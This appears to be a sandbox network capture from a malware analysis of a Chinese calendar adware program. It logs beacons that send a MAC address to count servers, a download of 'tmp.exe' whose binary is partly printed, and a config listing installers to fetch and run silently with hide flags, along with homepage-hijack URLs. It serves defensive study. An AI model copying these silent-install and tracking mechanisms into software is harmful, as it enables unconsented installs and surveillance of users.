.redshu.com/daohang/xck.html?2,hXXp://baidu.kuaidi100.com/index2.html?
" app1img="_b" app2imgN="_f1" app2imgS="_f2" app3img="_del" />.. &l
t;item genre="live" uitype="noie_rili" name="...." ui_name="jiaqi" app
1img="_b" app2imgN="_f1" app2imgS="_f2" app3img="_del" />.. <
<<< skipped >>>

GET /PopBoxSmall.txt HTTP/1.1


User-Agent: HOST
Host: update.xiaoxinrili.com
Cache-Control: no-cache
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 19 Nov 2014 05:36:39 GMT
Accept-Ranges: bytes
ETag: "b64ab2caba3d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:30 GMT
Content-Length: 10
1,120,7200....


GET /PopBoxBig.txt HTTP/1.1


User-Agent: HOST
Host: update.xiaoxinrili.com
Cache-Control: no-cache
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 12 Jun 2014 07:47:50 GMT
Accept-Ranges: bytes
ETag: "3c8dfd9b1286cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:31 GMT
Content-Length: 11
0,300,14400....


GET /update.txt HTTP/1.1


User-Agent: HOST
Host: update.xiaoxinrili.com
Cache-Control: no-cache
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 01 Apr 2014 07:28:05 GMT
Accept-Ranges: bytes
ETag: "8b5be4eb7b4dcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:31 GMT
Content-Length: 34
1|5F0218693884A23493C4D700684C9076HTTP/1.1 200 OK..Content-Type: text/
plain..Last-Modified: Tue, 01 Apr 2014 07:28:05 GMT..Accept-Ranges: by
tes..ETag: "8b5be4eb7b4dcf1:0"..Server: Microsoft-IIS/7.5..X-Powered-B
y: ASP.NET..Date: Wed, 14 Jan 2015 11:53:31 GMT..Content-Length: 34..1
|5F0218693884A23493C4D700684C9076....


GET /Install.txt HTTP/1.1


User-Agent: HOST
Host: update.xiaoxinrili.com
Cache-Control: no-cache
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 24 Sep 2014 05:33:59 GMT
Accept-Ranges: bytes
ETag: "c1a82024b9d7cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:32 GMT
Content-Length: 34
0|71AF22E1A907CAE3F48F41360B58562BHTTP/1.1 200 OK..Content-Type: text/
plain..Last-Modified: Wed, 24 Sep 2014 05:33:59 GMT..Accept-Ranges: by
tes..ETag: "c1a82024b9d7cf1:0"..Server: Microsoft-IIS/7.5..X-Powered-B
y: ASP.NET..Date: Wed, 14 Jan 2015 11:53:32 GMT..Content-Length: 34..0
|71AF22E1A907CAE3F48F41360B58562B....


GET /weather.txt HTTP/1.1


User-Agent: MERONG(0.9/;p)
Accept: */*
Host: update.xiaoxinrili.com
Connection: Keep-Alive
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 13 Nov 2014 06:14:04 GMT
Accept-Ranges: bytes
ETag: "8ee53b69ffcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:34 GMT
Content-Length: 38
12154|1b5d950e15ba193e96405dd75be5ab1fHTTP/1.1 200 OK..Content-Type: t
ext/plain..Last-Modified: Thu, 13 Nov 2014 06:14:04 GMT..Accept-Ranges
: bytes..ETag: "8ee53b69ffcf1:0"..Server: Microsoft-IIS/7.5..X-Powered
-By: ASP.NET..Date: Wed, 14 Jan 2015 11:53:34 GMT..Content-Length: 38.
.12154|1b5d950e15ba193e96405dd75be5ab1f....


GET /tj.html?%original file name%.exe HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: update.xiaoxinrili.com
Connection: Keep-Alive
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896; CNZZDATA4881483=cnzz_eid=1393858484-1421236290-&ntime=1421236290


HTTP/1.1 200 OK
Content-Type: text/html
Content-Encoding: gzip
Last-Modified: Tue, 26 Aug 2014 06:29:52 GMT
Accept-Ranges: bytes
ETag: "3822fd24f7c0cf1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:37 GMT
Content-Length: 485
.............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{
....{....;.N'...?\fd.l..J...!....?~|.?"...O.<y...<M...<......
......~0..?.....E.f.t..M.~..Wo.m.|..=z..m...............T.k..c..i]....
..}4o....w.......?.O.......j..=..g....v....U>.....1F.."....d..k...u
&..n....j.w.......GG.Y.....UWm5....tk..i.}.~.Y:...E.l.e5...Z.M.;...~D.
B..w?J.._....}....|k...i...>..........1..q....Z...vv..?.....~..Z..f
..`............]9.MA.....b...{j ..{....c....:.../...;w.=*....y..$V._..
...i..(...HTTP/1.1 200 OK..Content-Type: text/html..Content-Encoding: 
gzip..Last-Modified: Tue, 26 Aug 2014 06:29:52 GMT..Accept-Ranges: byt
es..ETag: "3822fd24f7c0cf1:0"..Vary: Accept-Encoding..Server: Microsof
t-IIS/7.5..X-Powered-By: ASP.NET..Date: Wed, 14 Jan 2015 11:53:37 GMT.
.Content-Length: 485...............`.I.%&/m.{.J.J..t...`.$..@.........
iG#).*..eVe]f.@......{....{....;.N'...?\fd.l..J...!....?~|.?"...O.<
y...<M...<............~0..?.....E.f.t..M.~..Wo.m.|..=z..m.......
........T.k..c..i]......}4o....w.......?.O.......j..=..g....v....U>
.....1F.."....d..k...u&..n....j.w.......GG.Y.....UWm5....tk..i.}.~.Y:.
..E.l.e5...Z.M.;...~D.B..w?J.._....}....|k...i...>..........1..q...
.Z...vv..?.....~..Z..f..`............]9.MA.....b...{j ..{....c....:...
/...;w.=*....y..$V._.....i..(.......
<<< skipped >>>

GET /tmp.exe HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT)
Host: update.xiaoxinrili.com
Cache-Control: no-cache
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896; CNZZDATA4881483=cnzz_eid=1393858484-1421236290-&ntime=1421236290; CNZZDATA4878044=cnzz_eid=1356438655-1421233298-&ntime=1421233298


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 31 Mar 2014 01:38:57 GMT
Accept-Ranges: bytes
ETag: "9a11defb814ccf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:53 GMT
Content-Length: 105984
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...................
......<.......-.......;.......................2.......,.......)....
.Rich............................PE..L...1.8S.........................
... "............@.......................................@............
.........................P............................................
.......................0...@...............X..........................
..text............................... ..`.rdata... .......,...........
.......@..@.data...............................@....rsrc..............
.................@..@.reloc..&...........................@..B.........
......................................................................
......................................................................
......................................................................
......................................................................
...................................................@..^........V......
@..K....D$..t.V..........^...............SU.l$.VWj.j......h(..........
.....VS..(................j.....@.....@...........~$......:.u...t..P.:
Q.u.........u.3........V..u........._^]..[.S.......t<.....d$...:.u.
..t..P.:Q.u.........u.3..........t.VS.f.....u.S....@.V........_^]2.[..
....h....h..@.j.....@....@..P.........@..u. ......t.....@..:\t.AJ;.r.3
.. .....@.....@................D$.....8.u.3.......VWP......t$,.=L.@...
.jdhp.@.jgV...@...jdh..@.jmV.........V..........u._^......jmV..H.@
<<< skipped >>>

GET /FMTFilterinset.txt HTTP/1.1


User-Agent: HOST
Host: update.xiaoxinrili.com
Cache-Control: no-cache
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896; CNZZDATA4881483=cnzz_eid=1393858484-1421236290-&ntime=1421236290; CNZZDATA4878044=cnzz_eid=1356438655-1421233298-&ntime=1421233298; CNZZDATA5614889=cnzz_eid=808136781-1421233891-&ntime=1421233891


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Sun, 04 Jan 2015 13:34:12 GMT
Accept-Ranges: bytes
ETag: "d09630202328d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:54:01 GMT
Content-Length: 108
setup_zol-a1480.exe,setup_smx1208.exe,setup_smx1226.exe,setup_pp0104.e
xe,setup_smx0104.exe,setup_zjm0104.exeHTTP/1.1 200 OK..Content-Type: t
ext/plain..Last-Modified: Sun, 04 Jan 2015 13:34:12 GMT..Accept-Ranges
: bytes..ETag: "d09630202328d01:0"..Server: Microsoft-IIS/7.5..X-Power
ed-By: ASP.NET..Date: Wed, 14 Jan 2015 11:54:01 GMT..Content-Length: 1
08..setup_zol-a1480.exe,setup_smx1208.exe,setup_smx1226.exe,setup_pp01
04.exe,setup_smx0104.exe,setup_zjm0104.exe..



GET /startup?appname=cmlsaXF1aWNrZW4=&version=4.0&sid=00-0C-29-FD-55-AD&pos=NmFjYWQwNGJiMDM1MDFkYzkyMDc3OGVkMTJiYTZkNjM=&s=5ADBD1D5A76F0851324A6BD5DB34474B HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: count.xiaoxinrili.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.4.2
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.17
Set-Cookie: laravel_session=8d0iqlnbo9lkjfph1n67qapk35; expires=Wed, 14-Jan-2015 13:50:15 GMT; path=/; HttpOnly
Set-Cookie: laravel_session=8d0iqlnbo9lkjfph1n67qapk35; expires=Wed, 14-Jan-2015 13:50:15 GMT; path=/; httponly
Cache-Control: no-cache
Date: Wed, 14 Jan 2015 11:50:15 GMT
1..1..0..HTTP/1.1 200 OK..Server: nginx/1.4.2..Content-Type: text/html
; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..X
-Powered-By: PHP/5.4.17..Set-Cookie: laravel_session=8d0iqlnbo9lkjfph1
n67qapk35; expires=Wed, 14-Jan-2015 13:50:15 GMT; path=/; HttpOnly..Se
t-Cookie: laravel_session=8d0iqlnbo9lkjfph1n67qapk35; expires=Wed, 14-
Jan-2015 13:50:15 GMT; path=/; httponly..Cache-Control: no-cache..Date
: Wed, 14 Jan 2015 11:50:15 GMT..1..1..0..



GET /ico/xiangmu2.ico HTTP/1.0
Host: update.redshu.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; KngStr_IAM)


HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Mon, 05 Jan 2015 10:01:09 GMT
Accept-Ranges: bytes
ETag: "14f8a87ce28d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:26 GMT
Connection: keep-alive
Content-Length: 16958
......@@.... .(B......(...@......... ......B..........................
......................................................................
......................................................................
......................................................................
......................................................................
....................................................................^`
b.tuy.orw<lpvXSW^lTX]|MPV.JLR.OQX~WZ_r\ag`tw{Elnt'.................
......................................................................
......................................................................
...................................}../...f....NSW.:=B.%& ... ........
....... ..............$&./37.QUY.ux{.....z{~C__a......................
......................................................................
.....................................................................a
fp....ylqw.26<.. #...... !..!".."". ""..  ..#$..!".# #.%!$.# ".#"#.
 !#. ! ..!!........../3.ccg........6eeg...............................
......................................................................
........................................gpw2....PV].. '.. #...!.!""."!
#. "%. #$..!"...!........... ... .....#.$...".....   .....! "." #.! #.
..!... .HHI........TZ^_...............................................
......................................................................
........U^n%|...SZ[......!"..!!.   ..,-.#"". .!...!...!..... .'.% -.0,
6.308.-(0.(#,.!.(...!..."...#.....#&'...!.. ". "$.!"#.&().....FEI.
<<< skipped >>>


GET /16246473.js HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: js.users.51.la
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Length: 1981
Content-Type: application/x-javascript
Last-Modified: Mon, 05 Jan 2015 07:54:16 GMT
Accept-Ranges: bytes
ETag: "14dbbcdbc28d01:14d7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:51:21 GMT
Connection: close
document.write ('<a href="hXXp://VVV.51.la/?16246473" target="_blan
k"><img alt="51.la 专业
;、免费、强健的访•
EE;统计" src="hXXp://icon.ajiang.net/icon_9.gif" style="bo
rder:none" /></a>\n');..var a6473tf="51la";var a6473pu="";var
 a6473pf="51la";var a6473su=window.location;var a6473sf=document.refer
rer;var a6473of="";var a6473op="";var a6473ops=1;var a6473ot=1;var a64
73d=new Date();var a6473color="";if (navigator.appName=="Netscape"){a6
473color=screen.pixelDepth;} else {a6473color=screen.colorDepth;}..try
{a6473tf=top.document.referrer;}catch(e){}..try{a6473pu =window.parent
.location;}catch(e){}..try{a6473pf=window.parent.document.referrer;}ca
tch(e){}..try{a6473ops=document.cookie.match(new RegExp("(^| )AJSTAT_o
k_pages=([^;]*)(;|$)"));a6473ops=(a6473ops==null)?1: (parseInt(unescap
e((a6473ops)[2])) 1);var a6473oe =new Date();a6473oe.setTime(a6473oe.g
etTime() 60*60*1000);document.cookie="AJSTAT_ok_pages=" a6473ops  ";pa
th=/;expires=" a6473oe.toGMTString();a6473ot=document.cookie.match(new
 RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a6473ot==null){a6473o
t=1;}else{a6473ot=parseInt(unescape((a6473ot)[2])); a6473ot=(a6473ops=
=1)?(a6473ot 1):(a6473ot);}a6473oe.setTime(a6473oe.getTime() 365*24*60
*60*1000);document.cookie="AJSTAT_ok_times=" a6473ot ";path=/;expires=
" a6473oe.toGMTString();}catch(e){}..try{if(document.cookie==""){a6473
ops=-1;a6473ot=-1;}}catch(e){}..a6473of=a6473sf;if(a6473pf!=="51la
<<< skipped >>>


GET /icon_9.gif HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: icon.ajiang.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: max-age=14400
Content-Length: 893
Content-Type: image/gif
Last-Modified: Fri, 26 May 2006 14:28:04 GMT
Accept-Ranges: bytes
ETag: "0b24a99d080c61:1566"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:51:20 GMT
Connection: close
GIF89a0............`..6..4.........f.........................!..NETSCA
PE2.0.....!.......,....0........I..8S.;'.'.cX.dj..hv ...A.5......I.@..
r......vN..G....k...0.....n..XN.{K..>.n>..q..V...9GOaes..r5VW.=2
\.o.......u....$Ik.2..#.............D.9.5.ZD............7.T.9.5.......
........!.......,....-.....].I2........f.H(..v.$6.-..i... ......oW..Z.
`'..._..r.*..V.U..n..NX.5 ....a...b.Z.>...TYR...y...!.......,....-.
...._.I1........&...!.........0...[.....VEc...H Ng.....O2......V..vM.a
:..JM...d}.o..j....kY\...zvxw..!.......,.... .....d.I2........f.H(..v.
.Eb.."...eJ.....X...../RH...S.YS.C.t.B...li...[. ...&l8s..3.M...[|....
.:l~Z{o.....!.......,....-.....o.I1........&...!.U".."....i^.F.U....I.
..F....`9q....#15MI3.d.x,..D....K.m../.. .[.`.K...?Yc*)._.\'.p%\cs.&..
.'..!.......,.... .....j.I2........f.H(...J..J$6.1B.......0..gy..../."
.bD.........T.u%..!.6..bD.\..s5.Y.F....7.V.-imd.f{9r.ayu.....;..



GET /hezi/xxurl.html?iexplore.exe HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.xiaoxinrili.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 14 Jan 2015 11:51:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Vary: Accept-Encoding
Cache-Control: max-age=1200
Last-Modified: Fri, 26 Sep 2014 06:40:17 GMT
Cache-by-CoreNode: HIT From cha-ld-mgslb-gdzh-core1-mnd3
Content-Encoding: gzip
Cache-by-Node: HIT From cha-ld-gdmzh-cs1-nd33
f7............]..j.0.E....0`l....l..]...F...8..&n......d7g...6..!.4...
MaPS..3.>?5IG..h.s..../5.5..."hw.v!z... .(.D.R. %.^_.....Vd.c...^.a
.r.Po.@y..}GK..8.....L.....^.....uV{..T.!.....L|.B.(.p.#E-s....;.t`K.i
...H.N!..............}7.....l...g.._.#.di.....0..HTTP/1.1 200 OK..Serv
er: nginx/1.4.1..Date: Wed, 14 Jan 2015 11:51:36 GMT..Content-Type: te
xt/html..Transfer-Encoding: chunked..Vary: Accept-Encoding..Cache-Cont
rol: max-age=1200..Last-Modified: Fri, 26 Sep 2014 06:40:17 GMT..Cache
-by-CoreNode: HIT From cha-ld-mgslb-gdzh-core1-mnd3..Content-Encoding:
 gzip..Cache-by-Node: HIT From cha-ld-gdmzh-cs1-nd33..f7............].
.j.0.E....0`l....l..]...F...8..&n......d7g...6..!.4...MaPS..3.>?5IG
..h.s..../5.5..."hw.v!z... .(.D.R. %.^_.....Vd.c...^.a.r.Po.@y..}GK..8
.....L.....^.....uV{..T.!.....L|.B.(.p.#E-s....;.t`K.i...H.N!.........
.....}7.....l...g.._.#.di.....0..



GET /files/conn_engine/2.69.0.5490.zip HTTP/1.1
Range: bytes=0-
User-Agent: WDJConnEngine
Host: dl.wandoujia.com
Cache-Control: no-cache


HTTP/1.1 302 Found
Server: Tengine/1.4.6
Date: Wed, 14 Jan 2015 11:51:34 GMT
Content-Type: text/html
Content-Length: 266
Connection: keep-alive
Location: hXXp://dl.cdn.wandoujia.com/files/conn_engine/2.69.0.5490.zip
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>
..<head><title>302 Found</title></head>..<b
ody bgcolor="white">..<h1>302 Found</h1>..<p>The 
requested resource resides temporarily under a different URI.</p>
;..<hr/>Powered by Tengine/1.4.6..</body>..</html>..
HTTP/1.1 302 Found..Server: Tengine/1.4.6..Date: Wed, 14 Jan 2015 11:5
1:34 GMT..Content-Type: text/html..Content-Length: 266..Connection: ke
ep-alive..Location: hXXp://dl.cdn.wandoujia.com/files/conn_engine/2.69
.0.5490.zip..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.
.<html>..<head><title>302 Found</title></he
ad>..<body bgcolor="white">..<h1>302 Found</h1>..
<p>The requested resource resides temporarily under a different 
URI.</p>..<hr/>Powered by Tengine/1.4.6..</body>..&l
t;/html>....



GET /conn_engine_config_ini.php?ver=0&vendor=100000511 HTTP/1.1
Range: bytes=0-
User-Agent: WDJConnEngine
Host: cfg.pub.wandoujia.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/1.5.2
Date: Wed, 14 Jan 2015 11:51:33 GMT
Content-Type: text/html
Content-Length: 91
Connection: keep-alive
Pragma: public
Cache-Control: maxage=3600
Expires: Wed, 14 Jan 2015 12:51:33 GMT
Last-Modified: Wed,  08 Oct 2014 11:39:08 GMT
Etag: fec081d9f595daf7b341a9c631b6b888
[config].url=hXXp://dl.wandoujia.com/files/conn_engine/2.69.0.5490.zip
.version=2.69.0.5490.HTTP/1.1 200 OK..Server: Tengine/1.5.2..Date: Wed
, 14 Jan 2015 11:51:33 GMT..Content-Type: text/html..Content-Length: 9
1..Connection: keep-alive..Pragma: public..Cache-Control: maxage=3600.
.Expires: Wed, 14 Jan 2015 12:51:33 GMT..Last-Modified: Wed,  08 Oct 2
014 11:39:08 GMT..Etag: fec081d9f595daf7b341a9c631b6b888..[config].url
=hXXp://dl.wandoujia.com/files/conn_engine/2.69.0.5490.zip.version=2.6
9.0.5490...



GET /metro?sid=000C29FD55AD&s=B867EF90584DBE7ADA2C745D5A27E8C6&type=silent&appname=w5DCocOQw4LDiMOVw4DDug==&pos=NmFjYWQwNGJiMDM1MDFkYzkyMDc3OGVkMTJiYTZkNjM=&pn=inst HTTP/1.0
Host: count.xiaoxinrili.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: AppName:........; Compiled:201412311429; WinVer:5.01.2600 paX86; AdapterCount:1;


HTTP/1.1 200 OK
Server: nginx/1.4.2
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.4.17
Set-Cookie: laravel_session=jjnr74rehkj30evdm5ja63ssa1; expires=Wed, 14-Jan-2015 13:49:37 GMT; path=/; HttpOnly
Set-Cookie: laravel_session=jjnr74rehkj30evdm5ja63ssa1; expires=Wed, 14-Jan-2015 13:49:37 GMT; path=/; httponly
Cache-Control: private, must-revalidate
Date: Wed, 14 Jan 2015 11:49:37 GMT
pragma: no-cache
expires: -1
0..



GET /ini/read.php?t=slt&d=2014123114&c= HTTP/1.0
Host: ini.xiaoxinrili.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; KngStr_IAM)


HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Wed, 14 Jan 2015 11:50:41 GMT
Content-Type: text/plain; charset=GBK
Content-Length: 5467
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, private
X-Cache-CFC: EXPIRED - 1421236241.157 - httpGETini.xiaoxinrili.com/ini/read.php?t=slt&d=2014123114&c=
[Main]..wpFinished=..Ads=..MainPage=..WS=1..NoneUI=Lnk_Hao123|Lnk_ahxy
..pptv_NoneUI=..Un_Ads=..Un_MainPage=..Un_NoneUI=Lnk_Hao123|Lnk_cq....
[Lst]..NoneUI=1..Un_NoneUI=2..Channel1=smx1119,t10315,t10350,smx1208,t
10352,zjm0104..List1=..Channel2=smx1119,t10315,t10350,smx1208,t10352,z
jm0104..List2=..[Mp]..MainCap1=....360......MainPage1=Url_1..MainLock1
=0..WhiteList1=Url_2,Url_3,Url_4,Url_5..MainCap0=....360......MainPage
0=Url_0..MainLock0=0..WhiteList0=Url_2,Url_3,Url_4,Url_5..[Url]..Url0=
VVV.z7755.com..Url1=VVV.z7755.com..Url2=i1616.com..Url3=VVV.z7755.com.
.Url4=z8822.com..Url5=hXXp://hao.360.cn/?src=lm&ls=n162f37fb94..Url6=w
ww.z7755.com..[Exe]..Cap1=................Url1=hXXp://hezi.91danji.com
/bao/xx/WanDouJia_capher105_kb.exe..File1=WanDouJia_capher105_kb.exe..
Param1=-hide....Cap5=....37wan..............Url5=hXXp://d.wanyouxi7.co
m/37wan/37cs_wd/901373/Setup_37wanWd.exe..File5=Setup_37wanWd.exe..Par
am5=..Cap6=FM..................Url6=hXXp://down.yinyue.fm/open/setup_2
997.exe..File6=setup_2997.exe..Param6=..Cap7=..........Url7=hXXp://lkd
ownload.lkgame.com/SU_lk78_setup_LG0704.exe..File7=SU_lk78_setup_LG070
4.exe..Param7=..Cap8=7k7k..........Url8=hXXp://box.7k7k.com/manage/dow
nload_box.php?from=xiaoxin01..File8=QKGameHall_5.6.4.2_xiaoxin01.exe..
Param8=/YLXNotShowUI..Cap10=................360..........Url10=hXXp://
down.360safe.com/p/360Inst_oemqd2.exe..Exe10=360Inst_oemqd2.exe..Param
10=..Cap11=doyo..........Url11=hXXp://soft.doyo.cn/soft/doyo_3066_s.ex
e..File11=doyo_3066_s.exe..Param11=....Cap12=1666......Url12=http:
<<< skipped >>>


GET /stat.php?id=5554906&web_id=5554906 HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/tj/a1.html?%original file name%.exe&type=silent&hp=00&al=Lnk_Hao123_1|Lnk_ahxy_1&errno=
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s14.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 10072
Connection: keep-alive
Date: Wed, 14 Jan 2015 11:11:36 GMT
Last-Modified: Wed, 14 Jan 2015 11:11:36 GMT
Cache-Control: max-age=5400,s-maxage=5400
Age: 2390
X-Cache: HIT TCP_MEM_HIT dirn:6:444083222
X-Swift-SaveTime: Wed, 14 Jan 2015 11:11:36 GMT
X-Swift-CacheTime: 5400
Via: cache6.de1[0,200-0,H], cache8.de1[0,0]
(function(){function k(){this.c="5554906";this.R="z";this.N="";this.K=
"";this.M="";this.r="1421233896";this.P="hzs14.cnzz.com";this.L="";thi
s.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_cnzz_CV" 
this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};this.la(
)}function g(a,b){try{var c=.[];c.push("siteid=5554906");c.push("name=
" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.referrer));c.
push("page=" f(e.location.href));c.push("agent=" f(e.navigator.userAge
nt));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648*Math.rando
m()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}cat
ch(d){}}var h=document,e=window,f=encodeURIComponent,l=decodeURICompon
ent,n=unescape,p=escape;k.prototype={la:function(){try{this.U(),this.J
(),this.ia(),this.H(),this.o(),.this.ga(),this.fa(),this.ja(),this.j()
,this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa()
,e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}
},oa:function(){try{var a=this;e._czc={push:function(){return a.B.appl
y(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=e
._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<a.len
gth;b  ){var c=a[b];switch(c[0]){case "_setAccount":e._cz_account="[ob
ject String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.break;case "
_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPageview=c[1])}}
}catch(d){g(d,"cS failed")}},qa:function(){try{if("undefined"===typeof
 e._cz_account||e._cz_account===this.c){e._cz_account=this.c;if("[
<<< skipped >>>


